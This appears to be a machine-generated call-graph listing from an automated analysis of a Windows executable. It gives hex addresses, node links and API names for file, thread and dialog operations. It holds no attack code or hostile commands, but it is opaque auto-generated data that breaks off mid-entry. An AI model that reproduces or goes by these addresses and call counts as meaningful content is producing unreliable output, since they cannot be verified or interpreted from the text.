e7cdb4 135 API calls __EH_prolog3_GS 29214->29546 29216 e6d2e5 29217 e6d331 29216->29217 29218 e6d2ea 29216->29218 29217->29226 29618 e7cdb4 135 API calls __EH_prolog3_GS 29217->29618 29218->29226 29617 e6ab88 185 API calls 29218->29617 29219->29216 29224 e6bfeb 29219->29224 29219->29226 29220 e85734 __ehhandler$___std_fs_change_permissions@12 5 API calls 29221 e6d327 29220->29221 29221->29140 29224->29226 29447 e67e1b 29224->29447 29226->29220 29227 e6c0c8 29459 e7106b 29227->29459 29231 e6c151 29238 e6c16f 29231->29238 29548 e72095 45 API calls __EH_prolog3_GS 29231->29548 29232 e6c239 29234 e6c269 29232->29234 29236 e6c374 29232->29236 29242 e6c29b 29234->29242 29549 e619a9 26 API calls 29234->29549 29239 e6c3cf 29236->29239 29240 e6c3ea 29236->29240 29292 e6d205 29236->29292 29237 e6c948 29253 e6c97a 29237->29253 29584 e619a9 26 API calls 29237->29584 29238->29232 29551 e70ddb 28 API calls 29238->29551 29244 e61a66 26 API calls 29239->29244 29256 e6c409 29240->29256 29553 e6b92d 56 API calls __ehhandler$___std_fs_change_permissions@12 29240->29553 29241 e6d276 29241->29226 29616 e619a9 26 API calls 29241->29616 29242->29226 29550 e619a9 26 API calls 29242->29550 29247 e6c3da 29244->29247 29252 e61a66 26 API calls 29247->29252 29252->29226 29253->29226 29585 e619a9 26 API calls 29253->29585 29254 e6c33d _wcslen 29552 e6f103 52 API calls 2 library calls 29254->29552 29255 e6c4ea 29469 e6b2ee 29255->29469 29256->29255 29258 e6f711 53 API calls 29256->29258 29267 e6c49b 29258->29267 29261 e6c5c2 29262 e6c7d8 29261->29262 29266 e6c5cf 29261->29266 29562 e72a36 115 API calls 29262->29562 29263 e61a66 26 API calls 29263->29255 29301 e6c62c 29266->29301 29556 e657c0 28 API calls 2 library calls 29266->29556 29267->29263 29270 e6c501 29275 e6c551 29270->29275 29554 e619a9 26 API calls 29270->29554 29272 e6c8f0 29279 e6c9eb 29272->29279 29297 e6c8ff 29272->29297 29273 e6c830 29273->29272 29280 e6c859 29273->29280 29275->29226 29555 e619a9 26 API calls 29275->29555 29277 e6c743 29277->29241 29615 e619a9 26 API calls 29277->29615 29293 e6c874 29279->29293 29475 e6b345 29279->29475 29284 e6ed0d 49 API calls 29280->29284 29287 e6ca64 29280->29287 29280->29293 29281 e6c940 29283 e6ddc7 114 API calls 29281->29283 29283->29237 29289 e6c8b3 29284->29289 29285 e6ca01 29290 e6ca05 29285->29290 29481 e6b778 29285->29481 29286 e6d1f2 29288 e6ddc7 114 API calls 29286->29288 29287->29286 29313 e6cac5 29287->29313 29586 e6e152 29287->29586 29288->29292 29289->29293 29564 e6d8b8 29289->29564 29294 e6ddc7 114 API calls 29290->29294 29292->29237 29292->29277 29293->29287 29293->29290 29304 e6b345 90 API calls 29293->29304 29294->29277 29297->29281 29583 e6b544 144 API calls __EH_prolog3_GS 29297->29583 29300 e6cb15 29306 e6fd70 28 API calls 29300->29306 29301->29277 29302 e6c77a 29301->29302 29309 e6c781 29301->29309 29557 e6b015 28 API calls 29301->29557 29558 e72a36 115 API calls 29301->29558 29559 e632d2 89 API calls __ehhandler$___std_fs_change_permissions@12 29301->29559 29560 e6b8ed 89 API calls 29301->29560 29561 e632d2 89 API calls __ehhandler$___std_fs_change_permissions@12 29302->29561 29308 e6ca5e 29304->29308 29328 e6cb2f 29306->29328 29308->29287 29308->29290 29309->29273 29563 e6ede9 119 API calls __ehhandler$___std_fs_change_permissions@12 29309->29563 29311 e6cab7 29590 e69653 109 API calls 29311->29590 29511 e6fd70 29313->29511 29314 e6cc21 29315 e6cc76 29314->29315 29316 e6cf27 29314->29316 29317 e6cd33 29315->29317 29319 e6cc94 29315->29319 29320 e6cf50 29316->29320 29321 e6cf39 29316->29321 29341 e6ccb5 29316->29341 29594 e722b9 28 API calls 29317->29594 29323 e6ccd8 29319->29323 29333 e6cca3 29319->29333 29515 e79625 29320->29515 29601 e6d771 29321->29601 29322 e6cd69 29326 e7106b 45 API calls 29322->29326 29323->29341 29593 e6a7a2 142 API calls 29323->29593 29331 e6cd76 29326->29331 29327 e6cf73 29533 e794ea 29327->29533 29328->29314 29591 e6e39d 8 API calls 29328->29591 29595 e6b92d 56 API calls __ehhandler$___std_fs_change_permissions@12 29331->29595 29592 e632d2 89 API calls __ehhandler$___std_fs_change_permissions@12 29333->29592 29337 e6cdaf 29338 e6cddd 29337->29338 29339 e6cddf 29337->29339 29340 e6cdcd 29337->29340 29346 e6ce3e 29338->29346 29598 e619a9 26 API calls 29338->29598 29597 e6d3d7 135 API calls __ehhandler$___std_fs_change_permissions@12 29339->29597 29596 e6a496 119 API calls 29340->29596 29347 e6cf15 29341->29347 29600 e6fd28 5 API calls __ehhandler$___std_fs_change_permissions@12 29341->29600 29346->29341 29599 e619a9 26 API calls 29346->29599 29350 e6d044 29347->29350 29612 e632d2 89 API calls __ehhandler$___std_fs_change_permissions@12 29347->29612 29349 e6d115 29541 e6e772 29349->29541 29350->29286 29350->29349 29354 e6d161 29350->29354 29540 e6e8d9 SetEndOfFile 29350->29540 29353 e6d159 29355 e6de50 110 API calls 29353->29355 29354->29286 29356 e6f58b 49 API calls 29354->29356 29355->29354 29357 e6d1d2 29356->29357 29357->29286 29613 e632d2 89 API calls __ehhandler$___std_fs_change_permissions@12 29357->29613 29359 e6d1e8 29614 e69500 109 API calls __EH_prolog3_GS 29359->29614 29362 e6233e 29361->29362 29366 e62350 29361->29366 29362->29366 29821 e623b0 26 API calls 29362->29821 29363 e61a66 26 API calls 29365 e62369 29363->29365 29822 e62ed0 26 API calls 29365->29822 29366->29363 29368 e62374 29823 e624d9 26 API calls 29368->29823 29385 e6e927 29384->29385 29386 e6e931 29385->29386 29824 e693d7 110 API calls __EH_prolog3_GS 29385->29824 29386->29123 29388->29148 29389->29148 29391 e7028f __cftof 29390->29391 29398 e70152 29391->29398 29394 e61a66 26 API calls 29395 e702b4 29394->29395 29396 e85734 __ehhandler$___std_fs_change_permissions@12 5 API calls 29395->29396 29397 e702bf 29396->29397 29397->29171 29399 e625a4 26 API calls 29398->29399 29400 e701c7 29399->29400 29400->29394 29402 e6e862 29401->29402 29405 e6e875 29401->29405 29407 e6e880 29402->29407 29412 e69490 109 API calls 29402->29412 29404 e6e888 SetFilePointer 29406 e6e8a4 GetLastError 29404->29406 29404->29407 29405->29404 29405->29407 29406->29407 29408 e6e8ae 29406->29408 29407->29190 29408->29407 29413 e69490 109 API calls 29408->29413 29410->29193 29411->29185 29412->29405 29413->29407 29415 e8430c __EH_prolog3_GS 29414->29415 29430 e72117 29415->29430 29418 e74318 53 API calls 29419 e84342 29418->29419 29420 e76a25 53 API calls 29419->29420 29421 e8434c 29420->29421 29422 e61a66 26 API calls 29421->29422 29423 e8435b 29422->29423 29434 e83ec5 29423->29434 29426 e61a66 26 API calls 29427 e84375 29426->29427 29428 e85787 5 API calls 29427->29428 29429 e78665 29428->29429 29429->29140 29431 e72124 29430->29431 29432 e6769f 45 API calls 29431->29432 29433 e72136 29432->29433 29433->29418 29435 e83ed1 __EH_prolog3_GS 29434->29435 29436 e614a7 28 API calls 29435->29436 29437 e83edd 29436->29437 29438 e83572 21 API calls 29437->29438 29439 e83eec 29438->29439 29440 e61a66 26 API calls 29439->29440 29441 e83ef4 29440->29441 29442 e85787 5 API calls 29441->29442 29443 e83ef9 29442->29443 29443->29426 29444->29210 29445->29210 29446->29207 29448 e67e27 __EH_prolog3_GS 29447->29448 29619 e67bfc 29448->29619 29450 e67e68 29455 e67ed2 29450->29455 29456 e67e6c 29450->29456 29458 e67ebe 29450->29458 29624 e67bd6 30 API calls 29450->29624 29451 e85787 5 API calls 29452 e67ecf 29451->29452 29452->29227 29454 e61a66 26 API calls 29454->29456 29455->29458 29625 e6adaa CompareStringW 29455->29625 29456->29451 29458->29454 29468 e71095 29459->29468 29460 e71256 29462 e85734 __ehhandler$___std_fs_change_permissions@12 5 API calls 29460->29462 29461 e6769f 45 API calls 29463 e71241 29461->29463 29464 e6c11b 29462->29464 29465 e625a4 26 API calls 29463->29465 29464->29238 29547 e72095 45 API calls __EH_prolog3_GS 29464->29547 29466 e7124d 29465->29466 29467 e61a66 26 API calls 29466->29467 29467->29460 29468->29460 29468->29461 29470 e6b303 29469->29470 29471 e6b33b 29470->29471 29668 e69635 89 API calls 29470->29668 29471->29261 29471->29270 29473 e6b333 29669 e6204b 89 API calls __ehhandler$___std_fs_change_permissions@12 29473->29669 29476 e6b368 29475->29476 29480 e6b39e 29475->29480 29476->29480 29670 e785fd 75 API calls 29476->29670 29478 e6b39a 29478->29480 29671 e632a1 89 API calls __ehhandler$___std_fs_change_permissions@12 29478->29671 29480->29285 29482 e6b784 __EH_prolog3_GS 29481->29482 29483 e6b8e3 29482->29483 29485 e6d8b8 138 API calls 29482->29485 29484 e85787 5 API calls 29483->29484 29486 e6b8ea 29484->29486 29487 e6b7ef 29485->29487 29486->29293 29487->29483 29672 e69283 109 API calls 29487->29672 29489 e6b817 29490 e6ed0d 49 API calls 29489->29490 29491 e6b81d 29490->29491 29492 e6b838 29491->29492 29673 e6ed1f 29491->29673 29686 e71a27 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 29492->29686 29495 e6b83e 29495->29483 29687 e6204b 89 API calls __ehhandler$___std_fs_change_permissions@12 29495->29687 29497 e6b850 29499 e67673 28 API calls 29497->29499 29498 e6b827 29498->29492 29685 e632a1 89 API calls __ehhandler$___std_fs_change_permissions@12 29498->29685 29501 e6b859 29499->29501 29502 e6b88d 29501->29502 29688 e6ede9 119 API calls __ehhandler$___std_fs_change_permissions@12 29501->29688 29503 e6eaf3 54 API calls 29502->29503 29507 e6b8c9 29502->29507 29505 e6b8a1 29503->29505 29506 e6d8b8 138 API calls 29505->29506 29508 e6b8c5 29506->29508 29509 e61a66 26 API calls 29507->29509 29508->29507 29689 e69283 109 API calls 29508->29689 29509->29483 29512 e6fd7e 29511->29512 29514 e6fd88 29511->29514 29513 e856f6 28 API calls 29512->29513 29513->29514 29514->29300 29516 e79639 29515->29516 29517 e7975f 29516->29517 29520 e79644 29516->29520 29519 e8734a Concurrency::cancel_current_task RaiseException 29517->29519 29518 e79739 29518->29327 29525 e7970b 29519->29525 29520->29518 29521 e796ed 29520->29521 29523 e8d08c ___std_exception_copy 21 API calls 29520->29523 29520->29525 29521->29518 29524 e7971f 29521->29524 29521->29525 29522 e8734a Concurrency::cancel_current_task RaiseException 29528 e797a3 __EH_prolog3 __cftof 29522->29528 29523->29521 29524->29518 29691 e79556 89 API calls 4 library calls 29524->29691 29525->29522 29527 e79896 29527->29327 29528->29527 29529 e85b4b 28 API calls 29528->29529 29531 e7982d __cftof 29528->29531 29529->29531 29530 e8d08c ___std_exception_copy 21 API calls 29530->29531 29531->29527 29531->29530 29692 e69384 89 API calls 29531->29692 29535 e794f3 29533->29535 29534 e7951f 29708 e7abc8 155 API calls 29534->29708 29535->29534 29536 e79515 29535->29536 29539 e7951d 29535->29539 29693 e7b76f 29536->29693 29539->29341 29540->29349 29542 e6e783 29541->29542 29544 e6e792 29541->29544 29543 e6e789 FlushFileBuffers 29542->29543 29542->29544 29543->29544 29545 e6e80f SetFileTime 29544->29545 29545->29353 29546->29219 29547->29231 29548->29238 29549->29242 29550->29226 29551->29254 29552->29232 29553->29256 29554->29275 29555->29226 29556->29301 29557->29301 29558->29301 29559->29301 29560->29301 29561->29309 29562->29309 29563->29273 29565 e6d8c5 29564->29565 29566 e6ed0d 49 API calls 29565->29566 29569 e6d8d7 29566->29569 29567 e6d93e 29568 e6d953 29567->29568 29571 e6de9a 49 API calls 29567->29571 29574 e6eaf3 54 API calls 29568->29574 29580 e6d957 29568->29580 29569->29567 29570 e6d8e8 29569->29570 29578 e6ed0d 49 API calls 29569->29578 29569->29580 29790 e7846c 61 API calls __ehhandler$___std_fs_change_permissions@12 29569->29790 29791 e692e6 RaiseException Concurrency::cancel_current_task 29569->29791 29570->29569 29789 e6d990 125 API calls __EH_prolog3_GS 29570->29789 29571->29568 29575 e6d973 29574->29575 29576 e6d977 29575->29576 29577 e6d982 29575->29577 29581 e6de9a 49 API calls 29576->29581 29579 e6ec63 49 API calls 29577->29579 29578->29569 29579->29580 29580->29293 29581->29580 29583->29281 29584->29253 29585->29226 29587 e6e15b GetFileType 29586->29587 29588 e6caa5 29586->29588 29587->29588 29588->29313 29589 e632d2 89 API calls __ehhandler$___std_fs_change_permissions@12 29588->29589 29589->29311 29590->29313 29591->29314 29592->29341 29593->29341 29594->29322 29595->29337 29596->29338 29597->29338 29598->29346 29599->29341 29600->29347 29602 e6d77d __EH_prolog3 29601->29602 29603 e611dd 28 API calls 29602->29603 29604 e6d788 29603->29604 29605 e72af9 150 API calls 29604->29605 29611 e6d7b1 29605->29611 29606 e6d804 29608 e6d828 29606->29608 29800 e619a9 26 API calls 29606->29800 29608->29341 29610 e72af9 150 API calls 29610->29611 29611->29606 29611->29610 29792 e72ce5 29611->29792 29612->29350 29613->29359 29614->29286 29615->29241 29616->29226 29617->29226 29618->29226 29626 e6790e 29619->29626 29622 e6790e 47 API calls 29623 e67c1d 29622->29623 29623->29450 29624->29450 29625->29458 29627 e7106b 45 API calls 29626->29627 29628 e67989 _wcslen 29627->29628 29629 e67b1b 29628->29629 29636 e67673 28 API calls 29628->29636 29637 e72117 45 API calls 29628->29637 29639 e7106b 45 API calls 29628->29639 29640 e6769f 45 API calls 29628->29640 29641 e61a66 26 API calls 29628->29641 29643 e67bc2 29628->29643 29648 e71a9f 29628->29648 29652 e61b63 29628->29652 29656 e67bd6 30 API calls 29628->29656 29634 e67b4a 29629->29634 29657 e619a9 26 API calls 29629->29657 29630 e85734 __ehhandler$___std_fs_change_permissions@12 5 API calls 29633 e67bbb 29630->29633 29632 e67b92 29632->29630 29633->29622 29633->29623 29634->29632 29658 e619a9 26 API calls 29634->29658 29636->29628 29637->29628 29639->29628 29640->29628 29641->29628 29644 e61a66 26 API calls 29643->29644 29645 e67bc7 29644->29645 29646 e61a66 26 API calls 29645->29646 29646->29629 29649 e71ab1 29648->29649 29659 e696e5 29649->29659 29653 e61b8e 29652->29653 29654 e61b6f 29652->29654 29667 e613f7 28 API calls 29653->29667 29654->29628 29656->29628 29657->29634 29658->29632 29660 e696f1 _wcslen 29659->29660 29663 e690f4 29660->29663 29666 e69137 __cftof 29663->29666 29664 e85734 __ehhandler$___std_fs_change_permissions@12 5 API calls 29665 e691a9 29664->29665 29665->29628 29666->29664 29667->29654 29668->29473 29669->29471 29670->29478 29671->29480 29672->29489 29674 e6ed2b __EH_prolog3_GS 29673->29674 29675 e6ed38 GetFileAttributesW 29674->29675 29676 e6ed46 29675->29676 29684 e6edad 29675->29684 29678 e7169a 47 API calls 29676->29678 29677 e85787 5 API calls 29679 e6edc3 29677->29679 29680 e6ed68 29678->29680 29679->29498 29681 e6ed81 29680->29681 29682 e6ed78 GetFileAttributesW 29680->29682 29681->29684 29690 e619a9 26 API calls 29681->29690 29682->29681 29684->29677 29685->29492 29686->29495 29687->29497 29688->29502 29689->29507 29690->29684 29691->29518 29692->29531 29709 e797a4 29693->29709 29696 e7bb9c 29741 e7a814 129 API calls __InternalCxxFrameHandler 29696->29741 29698 e7bbb5 __InternalCxxFrameHandler 29699 e85734 __ehhandler$___std_fs_change_permissions@12 5 API calls 29698->29699 29700 e7bbfc 29699->29700 29700->29539 29705 e7b78e __InternalCxxFrameHandler 29705->29696 29716 e72af9 29705->29716 29727 e77590 29705->29727 29733 e7a008 150 API calls 29705->29733 29734 e7bc05 150 API calls 29705->29734 29735 e777cf 29705->29735 29739 e79a2b 129 API calls 29705->29739 29740 e7c27f 155 API calls 29705->29740 29708->29539 29711 e797b0 __EH_prolog3 __cftof 29709->29711 29710 e79896 29710->29705 29711->29710 29712 e85b4b 28 API calls 29711->29712 29714 e7982d __cftof 29711->29714 29712->29714 29713 e8d08c ___std_exception_copy 21 API calls 29713->29714 29714->29710 29714->29713 29742 e69384 89 API calls 29714->29742 29724 e72b0f __InternalCxxFrameHandler 29716->29724 29717 e72c7f 29718 e72cb3 29717->29718 29743 e72ab0 29717->29743 29719 e72cd4 29718->29719 29749 e682a0 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 29718->29749 29750 e773f8 29719->29750 29724->29717 29725 e72c76 29724->29725 29747 e6fe6f 123 API calls __EH_prolog3 29724->29747 29748 e7cdb4 135 API calls __EH_prolog3_GS 29724->29748 29725->29705 29728 e775a1 29727->29728 29729 e7759c 29727->29729 29730 e775b1 29728->29730 29732 e777cf 113 API calls 29728->29732 29766 e77628 29729->29766 29730->29705 29732->29730 29733->29705 29734->29705 29736 e77806 29735->29736 29737 e777db ResetEvent ReleaseSemaphore 29735->29737 29736->29705 29781 e775ed WaitForSingleObject 29737->29781 29739->29705 29740->29705 29741->29698 29742->29714 29744 e72af5 29743->29744 29745 e72ab8 29743->29745 29744->29718 29745->29744 29756 e78618 29745->29756 29747->29724 29748->29724 29749->29719 29751 e773ff 29750->29751 29753 e7741a 29751->29753 29764 e692e6 RaiseException Concurrency::cancel_current_task 29751->29764 29754 e7742b SetThreadExecutionState 29753->29754 29765 e692e6 RaiseException Concurrency::cancel_current_task 29753->29765 29754->29725 29759 e84231 29756->29759 29760 e760d5 29759->29760 29761 e84248 SendDlgItemMessageW 29760->29761 29762 e80678 PeekMessageW GetMessageW IsDialogMessageW TranslateMessage DispatchMessageW 29761->29762 29763 e78638 29762->29763 29763->29744 29764->29753 29765->29754 29770 e77633 29766->29770 29771 e776a1 29766->29771 29767 e77638 CreateThread 29767->29770 29777 e77760 29767->29777 29769 e77690 SetThreadPriority 29769->29770 29770->29767 29770->29769 29770->29771 29774 e692eb 109 API calls __EH_prolog3_GS 29770->29774 29775 e69500 109 API calls __EH_prolog3_GS 29770->29775 29776 e692e6 RaiseException Concurrency::cancel_current_task 29770->29776 29771->29728 29774->29770 29775->29770 29776->29770 29780 e7776e 116 API calls 29777->29780 29779 e77769 29780->29779 29782 e77624 29781->29782 29783 e775fe GetLastError 29781->29783 29782->29736 29787 e692eb 109 API calls __EH_prolog3_GS 29783->29787 29785 e77618 29788 e692e6 RaiseException Concurrency::cancel_current_task 29785->29788 29787->29785 29788->29782 29789->29570 29790->29569 29791->29569 29793 e72cfe __InternalCxxFrameHandler 29792->29793 29794 e72d18 29792->29794 29796 e72d42 29793->29796 29818 e6fe6f 123 API calls __EH_prolog3 29793->29818 29794->29793 29801 e6e948 29794->29801 29798 e773f8 2 API calls 29796->29798 29799 e72d47 29798->29799 29799->29611 29800->29608 29802 e6e954 __EH_prolog3_GS 29801->29802 29803 e6e963 29802->29803 29804 e6e976 GetStdHandle 29802->29804 29816 e6e988 29802->29816 29805 e85787 5 API calls 29803->29805 29804->29816 29807 e6eaab 29805->29807 29806 e6e9df WriteFile 29806->29816 29807->29793 29808 e6e9af WriteFile 29809 e6e9ad 29808->29809 29808->29816 29809->29808 29809->29816 29811 e6ea77 29812 e614a7 28 API calls 29811->29812 29813 e6ea84 29812->29813 29820 e69653 109 API calls 29813->29820 29815 e6ea97 29817 e61a66 26 API calls 29815->29817 29816->29803 29816->29806 29816->29808 29816->29809 29816->29811 29819 e69230 111 API calls 29816->29819 29817->29803 29818->29796 29819->29816 29820->29815 29822->29368 29824->29386 29826 e6f835 __EH_prolog3_GS 29825->29826 29827 e6f847 FindFirstFileW 29826->29827 29828 e6f925 FindNextFileW 29826->29828 29830 e6f948 29827->29830 29832 e6f86a 29827->29832 29829 e6f937 GetLastError 29828->29829 29828->29830 29848 e6f90d 29829->29848 29836 e614a7 28 API calls 29830->29836 29833 e7169a 47 API calls 29832->29833 29834 e6f88c 29833->29834 29837 e6f8ac 29834->29837 29840 e6f89c FindFirstFileW 29834->29840 29841 e6f899 29834->29841 29835 e85787 5 API calls 29838 e6f733 29835->29838 29839 e6f95f 29836->29839 29847 e6f8e8 29837->29847 29849 e619a9 26 API calls 29837->29849 29838->29155 29838->29158 29850 e7229d 29839->29850 29840->29837 29841->29840 29844 e6f902 GetLastError 29844->29848 29846 e61a66 26 API calls 29846->29848 29847->29830 29847->29844 29848->29835 29849->29847 29851 e722a6 29850->29851 29854 e7236c 29851->29854 29855 e72378 29854->29855 29858 e7238e 29855->29858 29857 e6f970 29857->29846 29859 e724e5 29858->29859 29860 e723a4 29858->29860 29866 e658cb 45 API calls 29859->29866 29864 e723bc 29860->29864 29865 e70c7f 28 API calls 29860->29865 29864->29857 29865->29864 29871 e6d70b 29867->29871 29873 e6d6e5 29867->29873 29870 e6ec63 49 API calls 29870->29873 29903 e6d89e 29871->29903 29872 e6b231 26 API calls 29874 e6d74c 29872->29874 29873->29870 29873->29871 29875 e61a66 26 API calls 29874->29875 29876 e6d755 29875->29876 29877 e61a66 26 API calls 29876->29877 29878 e6d75e 29877->29878 29879 e85734 __ehhandler$___std_fs_change_permissions@12 5 API calls 29878->29879 29880 e6b1bf 29879->29880 29880->29064 29887 e7909b 29880->29887 29882 e728bb 29881->29882 29908 e6fb8e 29882->29908 29884 e728ed 29885 e6fb8e 118 API calls 29884->29885 29886 e728f8 29885->29886 29888 e790aa 29887->29888 29889 e774ec 118 API calls 29888->29889 29890 e790b9 29888->29890 29889->29890 29919 e74264 26 API calls 29890->29919 29892 e790e8 29920 e74264 26 API calls 29892->29920 29894 e790f3 29921 e74264 26 API calls 29894->29921 29896 e790fe 29922 e74288 26 API calls 29896->29922 29898 e79132 29899 e62e8b 26 API calls 29898->29899 29900 e7913a 29899->29900 29901 e62e8b 26 API calls 29900->29901 29902 e79142 29901->29902 29904 e6d714 29903->29904 29905 e6d8a8 29903->29905 29904->29872 29907 e6ae77 26 API calls 29905->29907 29907->29904 29909 e6fbbb 29908->29909 29911 e6fbc2 29908->29911 29912 e774ec 29909->29912 29911->29884 29913 e777cf 113 API calls 29912->29913 29914 e77518 ReleaseSemaphore 29913->29914 29915 e77556 DeleteCriticalSection CloseHandle CloseHandle 29914->29915 29916 e77538 29914->29916 29915->29911 29917 e775ed 111 API calls 29916->29917 29918 e77542 CloseHandle 29917->29918 29918->29915 29918->29916 29919->29892 29920->29894 29921->29896 29922->29898 29932 e7eac4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 29923->29932 29925 e7eaad 29927 e7eab9 29925->29927 29933 e7eae5 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 29925->29933 29927->28635 29927->28636 29928->28644 29929->28647 29930->28647 29931->28650 29932->29925 29933->29927 29934->28653 29935->28656 29936->28668 29938 e6e910 110 API calls 29937->29938 29939 e62dc7 29938->29939 29940 e627e0 133 API calls 29939->29940 29943 e62de4 29939->29943 29941 e62dd4 29940->29941 29941->29943 29948 e6204b 89 API calls __ehhandler$___std_fs_change_permissions@12 29941->29948 29943->28679 29943->28680 29945 e6279b 29944->29945 29947 e62797 29944->29947 29949 e626d2 29945->29949 29947->28685 29948->29943 29950 e626e4 29949->29950 29951 e62721 29949->29951 29952 e652d8 133 API calls 29950->29952 29957 e65767 29951->29957 29955 e62704 29952->29955 29955->29947 29960 e65770 29957->29960 29958 e652d8 133 API calls 29958->29960 29959 e62742 29959->29955 29962 e62c30 29959->29962 29960->29958 29960->29959 29961 e773f8 2 API calls 29960->29961 29961->29960 29963 e62c3c __EH_prolog3_GS 29962->29963 29984 e65365 29963->29984 29965 e85787 5 API calls 29968 e62d18 29965->29968 29966 e62c5a 29967 e62c8f 29966->29967 29969 e62c86 29966->29969 29970 e62c91 29966->29970 29972 e62d02 29967->29972 30020 e619a9 26 API calls 29967->30020 29968->29955 30016 e7888c 28 API calls 29969->30016 29974 e62c9a 29970->29974 29977 e62cb9 29970->29977 29972->29965 30017 e7880e 28 API calls __EH_prolog3 29974->30017 29976 e62ca7 29978 e625a4 26 API calls 29976->29978 30018 e78707 29 API calls 2 library calls 29977->30018 29980 e62caf 29978->29980 29982 e61a66 26 API calls 29980->29982 29981 e62cd2 30019 e62ed0 26 API calls 29981->30019 29982->29967 29985 e65380 29984->29985 29986 e653ae 29985->29986 29987 e653ca 29985->29987 30021 e6204b 89 API calls __ehhandler$___std_fs_change_permissions@12 29986->30021 29989 e65634 29987->29989 29992 e653f6 29987->29992 30027 e6204b 89 API calls __ehhandler$___std_fs_change_permissions@12 29989->30027 29991 e653b9 29993 e85734 __ehhandler$___std_fs_change_permissions@12 5 API calls 29991->29993 29992->29991 29995 e79625 89 API calls 29992->29995 29994 e65659 29993->29994 29994->29966 30001 e65449 29995->30001 29996 e6547b 29997 e6550d 29996->29997 30015 e65472 29996->30015 30024 e72a36 115 API calls 29996->30024 29999 e6fd70 28 API calls 29997->29999 29998 e65477 29998->29996 30023 e6315d 28 API calls 29998->30023 30005 e65520 29999->30005 30000 e65467 30022 e6204b 89 API calls __ehhandler$___std_fs_change_permissions@12 30000->30022 30001->29996 30001->29998 30001->30000 30002 e7909b 118 API calls 30002->29991 30007 e655b9 30005->30007 30008 e655a9 30005->30008 30010 e794ea 155 API calls 30007->30010 30009 e6d771 155 API calls 30008->30009 30011 e655b7 30009->30011 30010->30011 30025 e6fd28 5 API calls __ehhandler$___std_fs_change_permissions@12 30011->30025 30013 e655f1 30013->30015 30026 e632d2 89 API calls __ehhandler$___std_fs_change_permissions@12 30013->30026 30015->30002 30016->29967 30017->29976 30018->29981 30019->29967 30020->29972 30021->29991 30022->30015 30023->29996 30024->29997 30025->30013 30026->30015 30027->29991 30029 e806cc GetDlgItem 30028->30029 30030 e80693 GetMessageW 30028->30030 30029->28703 30029->28704 30031 e806b8 TranslateMessage DispatchMessageW 30030->30031 30032 e806a9 IsDialogMessageW 30030->30032 30031->30029 30032->30029 30032->30031 30034 e67493 30033->30034 30035 e67441 30033->30035 30043 e61a92 28 API calls 30034->30043 30041 e6744c 30035->30041 30042 e612d3 28 API calls Concurrency::cancel_current_task 30035->30042 30039 e67471 30040 e611b8 28 API calls 30039->30040 30040->30041 30041->28717 30042->30039 30045 e768e0 __EH_prolog3_GS 30044->30045 30059 e7663b 30045->30059 30050 e76929 30057 e7696e 30050->30057 30072 e76a3d 30050->30072 30075 e67ff0 28 API calls 30050->30075 30051 e7698e 30056 e769d2 30051->30056 30077 e619a9 26 API calls 30051->30077 30053 e85787 5 API calls 30054 e769e8 30053->30054 30054->28350 30056->30053 30057->30051 30076 e67ff0 28 API calls 30057->30076 30060 e76651 30059->30060 30061 e766df 30059->30061 30060->30061 30062 e61b63 28 API calls 30060->30062 30063 e6adcc 30061->30063 30062->30060 30064 e6ae43 30063->30064 30067 e6addd 30063->30067 30079 e61a92 28 API calls 30064->30079 30071 e6ade8 30067->30071 30078 e612d3 28 API calls Concurrency::cancel_current_task 30067->30078 30069 e6ae17 30070 e611b8 28 API calls 30069->30070 30070->30071 30071->30050 30080 e6f68d 30072->30080 30075->30050 30076->30051 30077->30056 30078->30069 30081 e6f6a4 __vswprintf_c_l 30080->30081 30084 e8cee1 30081->30084 30087 e8afa4 30084->30087 30088 e8afcc 30087->30088 30089 e8afe4 30087->30089 30104 e901d3 20 API calls __dosmaperr 30088->30104 30089->30088 30090 e8afec 30089->30090 30106 e8b543 30090->30106 30093 e8afd1 30105 e8ac8e 26 API calls ___std_exception_copy 30093->30105 30096 e8afdc 30098 e85734 __ehhandler$___std_fs_change_permissions@12 5 API calls 30096->30098 30100 e6f6ae 30098->30100 30099 e8b074 30115 e8b8f3 51 API calls 3 library calls 30099->30115 30100->30050 30103 e8b07f 30116 e8b5c6 20 API calls _free 30103->30116 30104->30093 30105->30096 30107 e8b560 30106->30107 30113 e8affc 30106->30113 30107->30113 30117 e90005 GetLastError 30107->30117 30109 e8b581 30138 e90706 38 API calls __cftof 30109->30138 30111 e8b59a 30139 e90733 38 API calls __cftof 30111->30139 30114 e8b50e 20 API calls 2 library calls 30113->30114 30114->30099 30115->30103 30116->30096 30118 e9001b 30117->30118 30119 e90027 30117->30119 30140 e91b0b 11 API calls 2 library calls 30118->30140 30141 e91de6 20 API calls __dosmaperr 30119->30141 30122 e90021 30122->30119 30123 e90070 SetLastError 30122->30123 30123->30109 30124 e90033 30125 e9003b 30124->30125 30148 e91b61 11 API calls 2 library calls 30124->30148 30142 e903d4 30125->30142 30128 e90050 30128->30125 30130 e90057 30128->30130 30129 e90041 30131 e9007c SetLastError 30129->30131 30149 e8fe70 20 API calls __dosmaperr 30130->30149 30150 e8fc3e 38 API calls _abort 30131->30150 30133 e90062 30135 e903d4 _free 20 API calls 30133->30135 30137 e90069 30135->30137 30137->30123 30137->30131 30138->30111 30139->30113 30140->30122 30141->30124 30143 e90408 __dosmaperr 30142->30143 30144 e903df RtlFreeHeap 30142->30144 30143->30129 30144->30143 30145 e903f4 30144->30145 30151 e901d3 20 API calls __dosmaperr 30145->30151 30147 e903fa GetLastError 30147->30143 30148->30128 30149->30133 30151->30147 30152 e927e0 30153 e927e9 30152->30153 30154 e927f2 30152->30154 30156 e926d7 30153->30156 30157 e90005 _unexpected 38 API calls 30156->30157 30158 e926e4 30157->30158 30176 e927fe 30158->30176 30160 e926ec 30185 e9246b 30160->30185 30163 e92703 30163->30154 30166 e92746 30169 e903d4 _free 20 API calls 30166->30169 30168 e92739 30170 e92741 30168->30170 30173 e9275e 30168->30173 30169->30163 30200 e901d3 20 API calls __dosmaperr 30170->30200 30172 e9278a 30172->30166 30201 e92341 26 API calls 30172->30201 30173->30172 30174 e903d4 _free 20 API calls 30173->30174 30174->30172 30177 e9280a __FrameHandler3::FrameUnwindToState 30176->30177 30178 e90005 _unexpected 38 API calls 30177->30178 30183 e92814 30178->30183 30180 e92898 _abort 30180->30160 30183->30180 30184 e903d4 